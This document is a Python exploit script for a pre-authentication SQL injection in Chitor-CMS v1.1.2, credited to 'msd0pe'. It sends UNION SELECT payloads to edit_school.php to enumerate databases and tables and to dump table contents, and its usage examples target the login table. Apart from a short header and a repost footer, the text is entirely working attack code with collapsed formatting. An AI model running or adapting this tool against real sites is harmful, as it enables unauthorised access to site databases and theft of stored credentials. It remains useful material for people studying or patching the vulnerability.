#!/usr/bin/python3######################################################## ## Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection ## Date: 2023/04/13 ## ExploitAuthor: msd0pe ## Project: https://github.com/waqaskanju/Chitor-CMS ## My Github: https://github.com/msd0pe-1 ## Patched the 2023/04/16: 69d3442 commit ## ########################################################__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'__author__ = 'msd0pe'__version__ = '1.1'__date__ = '2023/04/13'class bcolors:PURPLE = '33[95m'BLUE = '33[94m'GREEN = '33[92m'OCRA = '33[93m'RED = '33[91m'CYAN = '33[96m'ENDC = '33[0m'BOLD = '33[1m'UNDERLINE = '33[4m'class infos:INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "import reimport requestsimport optparsefrom prettytable import PrettyTabledef DumpTable(url, database, table):header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}x = PrettyTable()columns = []payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name="" + table + "" AND table_schema="" + database + ""-- -"u = requests.get(url + payload, headers=header)try:r = re.findall("qpzkq[(.*?)]qjkbq",u.text)r = r[0].replace('"',"").split(',')if r == []:passelse:for i in r:columns.append(i)passexcept:passx.field_names = columnspayload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"u = requests.get(url + payload, headers=header)try:r = re.findall("qpzkq[(.*?)]qjkbq",u.text)r = r[0].replace('"',"").split(',')if r == []:passelse:for i in r:i = i.split("xzmdpl")x.add_rows([i])except ValueError:r = re.findall("qpzkq[(.*?)]qjkbq",u.text)r = r[0].replace('"',"").split(',')if r == []:passelse:for i in r:i = i.split("xzmdpl")i.append("")x.add_rows([i])print(x)def ListTables(url, database):header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}x = PrettyTable()x.field_names = ["TABLES"]payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"u = requests.get(url + payload, headers=header)try:r = re.findall("qpzkq[(.*?)]qjkbq",u.text)r = r[0].replace('"',"").split(',')if r == []:passelse:for i in r:x.add_row([i])except:passprint(x)def ListDatabases(url):header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}x = PrettyTable()x.field_names = ["DATABASES"]payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"u = requests.get(url + payload, headers=header)try:r = re.findall("qpzkq[(.*?)]qjkbq",u.text)r = r[0].replace('"',"").split(',')if r == []:passelse:for i in r:x.add_row([i])except:passprint(x)def Main():Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)Menu.add_option('-u', '--url', type="str", dest="url", help='target url')Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')(options, args) = Menu.parse_args()Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbspython3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tablespython3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump""")Menu.add_option_group(Examples)if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:Menu.print_help()print('')print(' %s' % __description__)print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)print(' Any malicious or illegal activity may be punishable by law')print(' Use at your own risk')elif len(args) == 0:try:if options.url != None:if options.l_databases != None:ListDatabases(options.url)if options.database != None: if options.l_tables != None:ListTables(options.url, options.database)if options.table != None:if options.dump != None:DumpTable(options.url, options.database, options.table)except:print("Unexpected error")if __name__ == '__main__':try:Main()except KeyboardInterrupt:print()print(infos.PROCESS + "Exiting...")print()exit(1)
Source: 9600403202-BLW/eussi/moc.ytirucesxc
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
